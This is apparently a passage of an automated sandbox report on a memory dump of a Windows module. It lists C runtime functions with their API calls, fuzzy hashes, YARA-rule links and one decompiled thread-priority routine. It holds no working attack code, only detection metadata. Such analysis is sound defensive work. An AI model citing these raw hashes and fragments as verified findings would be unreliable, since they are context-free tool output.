Instruction Fuzzy Hash: DC2191B2D00214ABDF04DFE5D884ADF7BACAF05714F008816B9199F141DB7095C4EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4166, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction ID: 34f62d6f2db5b71fbb03b47f6797b5c380bd8d9d2bb90131f4fbf084fc5808dd
Opcode Fuzzy Hash: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction Fuzzy Hash: 4921EB36A45622EBDB1187E5AC44B0E3BA89F26760F214610FD21F7280D730FD86A5E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF749, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000,00000000,00000001), ref: 6E1CF74E
_free.LIBCMT ref: 6E1CF7AB
_free.LIBCMT ref: 6E1CF7E1
SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,6E1C1234,?,?,6E183DFB,0000009C,6E183B81,?,?,00000008,6E18353E,00000000), ref: 6E1CF7EC

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: ffda3ae4057a6bda65c2734b922780cb641b195ae6b5a1cb06d2d059b89f5342
Instruction ID: 12a7eee53643361033cab14ec1fad328ea87e105dae03532860ea1aac3c101af
Opcode Fuzzy Hash: ffda3ae4057a6bda65c2734b922780cb641b195ae6b5a1cb06d2d059b89f5342
Instruction Fuzzy Hash: 09110A33214A012F9A415FF84CC4DAA25AEABF6A797350625F334C25C0DF2588CAB122

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF8A0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6E1C23F9,6E1D1C0A,?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2), ref: 6E1CF8A5
_free.LIBCMT ref: 6E1CF902
_free.LIBCMT ref: 6E1CF938
SetLastError.KERNEL32(00000000,6E218190,000000FF,?,?,?,6E1C23F9,6E1D1C0A,?,?,6E1C1383,?,?,?,6E1AADF4,?), ref: 6E1CF943

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d4ce87bb2aa0a77919d5f1fe03c6b492cfece298b88ed239b213743761dc31fa
Instruction ID: 165bf86af381295ff886f847db01daa110407d2c9303d727f47f51b3eac91406
Opcode Fuzzy Hash: d4ce87bb2aa0a77919d5f1fe03c6b492cfece298b88ed239b213743761dc31fa
Instruction Fuzzy Hash: CA11C6332049012B9A005EF94C85E9A25AFABF6B797350625F335C21C0DF258DC9B123

Uniqueness

Uniqueness Score: -1.00%

Function 6E182211, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182218
std::_Lockit::_Lockit.LIBCPMT ref: 6E182223
std::_Facet_Register.LIBCPMT ref: 6E182273
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182293

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 2d186118f79500d6c0ccb073e1e99d7d7120e4f57ddbc2fcd7d7bf60e64ec0ca
Instruction ID: a1c5c04b8f7cacb13ccf52ad92906ac4f23d7afc9012219eb88af9d8b177d68d
Opcode Fuzzy Hash: 2d186118f79500d6c0ccb073e1e99d7d7120e4f57ddbc2fcd7d7bf60e64ec0ca
Instruction Fuzzy Hash: AC112B71900626DFCB06CFF898500EEBB797F45314B24094AE421EB290DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1826F0, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1826F7
std::_Lockit::_Lockit.LIBCPMT ref: 6E182702
std::_Facet_Register.LIBCPMT ref: 6E182752
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182772

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 8725fd3e5cb2e64060704fddadf65440bd83fd04f85b4b2537c27832e9c83271
Instruction ID: 95efa4473a0e03fdf37a2baab2f2eb4755bf8ab7ec64fe845c331970b74d54b9
Opcode Fuzzy Hash: 8725fd3e5cb2e64060704fddadf65440bd83fd04f85b4b2537c27832e9c83271
Instruction Fuzzy Hash: 00110275D0062ADBCF06DFE8C8508EEBB797F55314B204A49E465EB290DB308AC8EF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E182379, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182380
std::_Lockit::_Lockit.LIBCPMT ref: 6E18238B
std::_Facet_Register.LIBCPMT ref: 6E1823DB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1823FB

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 3fe93a5a3c6803f8778b7bb66105910e172dfd44193fdbb80e95106a458568f3
Instruction ID: f57d229806c838259bed4717528a27fa39c4b0a212f0c76f997c151b2c6e0699
Opcode Fuzzy Hash: 3fe93a5a3c6803f8778b7bb66105910e172dfd44193fdbb80e95106a458568f3
Instruction Fuzzy Hash: DD11C67190062ADBCB06CFE8C8504EE7779BF49314B204959E525EB280DB308AC5EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E182A2B, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E182A32
std::_Lockit::_Lockit.LIBCPMT ref: 6E182A3D
std::_Facet_Register.LIBCPMT ref: 6E182A8D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E182AAD

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: e33d7cf581341ba6f16272479ec1ece33608068ea23a7118e59b6c63948b417f
Instruction ID: 2e6e07aba4ac90b499b5bd709a74e824e41124fdd0be9dea2a1e020004dbd3df
Opcode Fuzzy Hash: e33d7cf581341ba6f16272479ec1ece33608068ea23a7118e59b6c63948b417f
Instruction Fuzzy Hash: C711A57590062ADBCB16DFE8C8505EEB77A7F44714B204A49D426EB2C0DB308A85EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1813A3, Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1813AA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1813B5
std::_Facet_Register.LIBCPMT ref: 6E181405
std::_Lockit::~_Lockit.LIBCPMT ref: 6E181425

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: d008da9c2ac84d7be36e1dd0538b917fbd1b8236dfed9b1645d9b4391db640ad
Instruction ID: c8bd9356940136bb753bf213a0bbd8adf3925c21c72c38f7fddb34a99ad4d216
Opcode Fuzzy Hash: d008da9c2ac84d7be36e1dd0538b917fbd1b8236dfed9b1645d9b4391db640ad
Instruction Fuzzy Hash: 1B11A975A0052ADBCB06DFE8C8504EEB7797F55314B204959D435EB2C0DB308A85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1996F2, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1996F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E199703
std::_Facet_Register.LIBCPMT ref: 6E199754
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199774

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 877734a03986d83d4ff066b6a3a165c649bc72a94f14c0432a0d71548515c9b2
Instruction ID: 5eaafbe0e6773fc60773ce2e47ac1865559b0f17b2273c51aa940c37ddae0ee0
Opcode Fuzzy Hash: 877734a03986d83d4ff066b6a3a165c649bc72a94f14c0432a0d71548515c9b2
Instruction Fuzzy Hash: 6A019639A005199FCF09DFE4D964AFD7779AF84314F244919E811AB280DF3099C5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199787, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19978E
std::_Lockit::_Lockit.LIBCPMT ref: 6E199798
std::_Facet_Register.LIBCPMT ref: 6E1997E9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199809

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: a95f868e469e200756e2ffb4bf2322053a8401e79a2ee8471038565a502dc6b2
Instruction ID: a75e34a17e5cfc73609fdb867ac19346fc9ac67af12394ad954cd6a7c5acaf49
Opcode Fuzzy Hash: a95f868e469e200756e2ffb4bf2322053a8401e79a2ee8471038565a502dc6b2
Instruction Fuzzy Hash: 4A01D275A005198FCF05DBE4C924AFE77BAAF84314F244919E811AB280DF349EC4FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198FF6, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198FFD
std::_Lockit::_Lockit.LIBCPMT ref: 6E199007
std::_Facet_Register.LIBCPMT ref: 6E199058
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199078

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 1d26886deaccdfebbd2c2365776b57d9338d013e6650ba0f85663db1c1821abf
Instruction ID: 6243579b6b5e705e895e802f865cb29328ee66af3bf37011419314ccd3b0cbf8
Opcode Fuzzy Hash: 1d26886deaccdfebbd2c2365776b57d9338d013e6650ba0f85663db1c1821abf
Instruction Fuzzy Hash: D901C435A001159FCF05DBE4C824AFE77BEAF84364F244809E825AB280CF719AC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19949E, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1994A5
std::_Lockit::_Lockit.LIBCPMT ref: 6E1994AF
std::_Facet_Register.LIBCPMT ref: 6E199500
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199520

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: cb722b6cb04ff2b06c0e4814df9545a9668094df28cfe650eedafbb6f33f982d
Instruction ID: 304965b77cae73b617bea79dc6c20b48b8e1b8d94871399632200c9b0c65a8d4
Opcode Fuzzy Hash: cb722b6cb04ff2b06c0e4814df9545a9668094df28cfe650eedafbb6f33f982d
Instruction Fuzzy Hash: 9E0184B59005199FCF05DBE4D864AFE7779BF84314F244909E821AB290CF709AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1934F1, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1934F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E193502
std::_Facet_Register.LIBCPMT ref: 6E193553
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193573

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 3a863901b8af4844ef48b38e63619f91cc5f1a40bcd2857331252ab786392432
Instruction ID: 26f09a5d5d68d31964b39b6bd944dfd069fc936176d831c07e34d94b45f09b13
Opcode Fuzzy Hash: 3a863901b8af4844ef48b38e63619f91cc5f1a40bcd2857331252ab786392432
Instruction Fuzzy Hash: 43018479A00519DFCB06DBE4D8546EE77B9AF84314F244849E815AB280DF30DAC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5D1E, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5D25
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5D2F
std::_Facet_Register.LIBCPMT ref: 6E1A5D80
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5DA0

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ae27061f720aea50b52b8369a5dc8e2edd3a299db1e76edbf723398041ab02a3
Instruction ID: a98182c47b4f44d21e2c1cbe93dd102e3b1d75bfc74c289e3b05ad0105120b69
Opcode Fuzzy Hash: ae27061f720aea50b52b8369a5dc8e2edd3a299db1e76edbf723398041ab02a3
Instruction Fuzzy Hash: FA01C439A00119DBCF05DBE8C814AFE777ABFC4318F244909E921AB280DF3099C5EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E199533, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19953A
std::_Lockit::_Lockit.LIBCPMT ref: 6E199544
std::_Facet_Register.LIBCPMT ref: 6E199595
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1995B5

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 8ff7d9cea170cbf3ccc78cb67769b0acca7f680325abbb762f44c2ecb788e5e4
Instruction ID: 84dfd3b6f4dfdbcf1ccb9d8ddfb0604cea7001353bbad243d6fce4a185ca67e2
Opcode Fuzzy Hash: 8ff7d9cea170cbf3ccc78cb67769b0acca7f680325abbb762f44c2ecb788e5e4
Instruction Fuzzy Hash: 6401C475A001199FCB05DBE4D824AFE7779AF84314F244909E812AB280CF30DEC8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E193586, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19358D
std::_Lockit::_Lockit.LIBCPMT ref: 6E193597
std::_Facet_Register.LIBCPMT ref: 6E1935E8
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193608

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ab34e9eb4f6c69666b0d1240756a100592af934a92039232aaf5d9724c346400
Instruction ID: 5dc0ecf0093aa5c2fd7aaa294e1ccc9ff0ecd5257c13098035591ba67b102a6f
Opcode Fuzzy Hash: ab34e9eb4f6c69666b0d1240756a100592af934a92039232aaf5d9724c346400
Instruction Fuzzy Hash: 9501C8359005159BCB05DBE4C8146FD777ABF84314F254949D525AB280DF309AC5F751

Uniqueness

Uniqueness Score: -1.00%

Function 6E1995C8, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1995CF
std::_Lockit::_Lockit.LIBCPMT ref: 6E1995D9
std::_Facet_Register.LIBCPMT ref: 6E19962A
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19964A

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: c13d0b772b5351ca802f9d75129846a07238eddc0dcf35bc313cb676ada1b494
Instruction ID: fd1e8ffaef74a995377b76ec1c2cf678ee96b9ef2237b59f72e05b6be5e3bb92
Opcode Fuzzy Hash: c13d0b772b5351ca802f9d75129846a07238eddc0dcf35bc313cb676ada1b494
Instruction Fuzzy Hash: 6701C035A001198FCF05DBE4C864AFE77BEAF84314F240809E825AB290CF319AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5ACA, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5AD1
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5ADB
std::_Facet_Register.LIBCPMT ref: 6E1A5B2C
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5B4C

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ef125bf1e9f00c75a0b29e15798e80a4e5338f4a7b0ae56c35c5ac3c05cb9683
Instruction ID: 7309d9075ccbe0192cc3475ae642f733b615cd0d104a48ee4987bd0c9e5fc04a
Opcode Fuzzy Hash: ef125bf1e9f00c75a0b29e15798e80a4e5338f4a7b0ae56c35c5ac3c05cb9683
Instruction Fuzzy Hash: 3B01C479900119CFCF05DBE8D910AFDBB7ABF84314F244809E921AB280CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5B5F, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5B66
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5B70
std::_Facet_Register.LIBCPMT ref: 6E1A5BC1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5BE1

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 447178fca4eada814e2e57e2b567011ab9a78c8db3e19095e1d24b05ecb32ec9
Instruction ID: f784c16ac2074349849e473471499696e2d9237f722dcf791dedc2107dfd37d2
Opcode Fuzzy Hash: 447178fca4eada814e2e57e2b567011ab9a78c8db3e19095e1d24b05ecb32ec9
Instruction Fuzzy Hash: F601C4799041198BCF05DBE8C914AFD77BABFC4314F240819E911AB280CF3099C8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19981C, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199823
std::_Lockit::_Lockit.LIBCPMT ref: 6E19982D
std::_Facet_Register.LIBCPMT ref: 6E19987E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19989E

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 9e49cac7386bf5329d0d93d8699a96d9403be2861f98b0bfdfdc0e04b17f6300
Instruction ID: 0ded393684258bff0ee14c6c5065d736be4c36119b1e92fdd071213cbea4ab64
Opcode Fuzzy Hash: 9e49cac7386bf5329d0d93d8699a96d9403be2861f98b0bfdfdc0e04b17f6300
Instruction Fuzzy Hash: F601C035A0051A8FCB05DBE4C864AFE77BDAF84314F280919E811AB280CF349AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19908B, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199092
std::_Lockit::_Lockit.LIBCPMT ref: 6E19909C
std::_Facet_Register.LIBCPMT ref: 6E1990ED
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19910D

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: e8fc847f41f4fd8c5cf65b4cbdb6c8c78b70aadd4da66afa3a070ccb7fc953f6
Instruction ID: 857a36f2ed671de1a3cf20e651f656c133df87466ab4c38e8023f070a43b368e
Opcode Fuzzy Hash: e8fc847f41f4fd8c5cf65b4cbdb6c8c78b70aadd4da66afa3a070ccb7fc953f6
Instruction Fuzzy Hash: 3B01D635A0011A9FCB05DBE4C928AFD777DBF95324F244819E821AB280CF359AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1998B1, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1998B8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1998C2
std::_Facet_Register.LIBCPMT ref: 6E199913
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199933

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 7d2aeb0342e9574ca8e475b7cd1e017c1fbf5073b5a12c737b66aa62069d201b
Instruction ID: cfa45a500bc7539d7bc3f3cd895dc6ddd334d744c3be93c1c3ee13246da88bdf
Opcode Fuzzy Hash: 7d2aeb0342e9574ca8e475b7cd1e017c1fbf5073b5a12c737b66aa62069d201b
Instruction Fuzzy Hash: 2301D635A00229DFCF05DBE4C864AFE77B9AF84314F244819E911AB280CF3099C4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199120, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199127
std::_Lockit::_Lockit.LIBCPMT ref: 6E199131
std::_Facet_Register.LIBCPMT ref: 6E199182
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1991A2

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 259611a0a81ae67e2994118404b99557e69d562cba63560f5cf24315049cfb7a
Instruction ID: c8bc42894fbf45b4e746cd9021823980d768bff9ae9d8a76996701db8287e144
Opcode Fuzzy Hash: 259611a0a81ae67e2994118404b99557e69d562cba63560f5cf24315049cfb7a
Instruction Fuzzy Hash: 7101A135A005159FCF05DBE4D8246FE77A9BF84324F244819E815AB280CF719EC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1991B5, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1991BC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1991C6
std::_Facet_Register.LIBCPMT ref: 6E199217
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199237

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ffdd013d2406f0b61d4cc966072eed4e6b4d15e6edd4b1dea9c64a2f56d6f8bf
Instruction ID: d6b66b6adfb652e5ce4050366fa8e97829aad5162ff4ed65cdec3f9817120acf
Opcode Fuzzy Hash: ffdd013d2406f0b61d4cc966072eed4e6b4d15e6edd4b1dea9c64a2f56d6f8bf
Instruction Fuzzy Hash: EB01C43590011A9FCF05DBE4C864AFD77B9AF84714F254859E821AB280CF3099C8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E16111A, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E16111A(void* __ecx, char _a4) {
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				if(SetThreadAffinityMask(_t13, 1) != 0) {
					SetThreadPriority(_t13, 0xffffffff);
				}
				_t4 = E6E16163F(_a4);
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e161123
0x6e161136
0x6e16113b
0x6e16113b
0x6e161141
0x6e161146
0x6e16114a
0x6e16114e
0x6e16114e
0x6e161158
0x6e161161

APIs

GetCurrentThread.KERNEL32 ref: 6E16111D
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E161128
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6E16113B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E16114E

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: e1ac75c5b8d19e693a7c9df3cafa164882cfe1cc779b22de714391a3b5f927ca
Instruction ID: 8d259148f935ca0c99059f45bce4ba9aa80687fc1bda8bb6cbd6b01432aebb5c
Opcode Fuzzy Hash: e1ac75c5b8d19e693a7c9df3cafa164882cfe1cc779b22de714391a3b5f927ca
Instruction Fuzzy Hash: 25E092313066116BAA416A694C88E6F676CEFD2331B118235F524D22D0CB649C5BA6A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6B4D, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000), ref: 6E1E6B64
GetLastError.KERNEL32(?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000,?,00000000,?,6E1D5D03,?), ref: 6E1E6B70

Part of subcall function 6E1E6B36: CloseHandle.KERNEL32(6E218970,6E1E6B80,?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000,?,00000000), ref: 6E1E6B46

___initconout.LIBCMT ref: 6E1E6B80
WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000,?), ref: 6E1E6B95

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseErrorHandleLast___initconout
String ID:
API String ID: 892448922-0
Opcode ID: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction ID: d97d8df498956f06a3ea0116ce9f6a935fcdc9b55cb856018c40bd61c93195b1
Opcode Fuzzy Hash: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction Fuzzy Hash: 7EF01C3A620918BBCF625FD1CC089CD3F26FB093A1B448411FF1895520CB32C9A0EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D02A7, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D06AC
_free.LIBCMT ref: 6E1D0701

Strings

-, xrefs: 6E1D054F

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
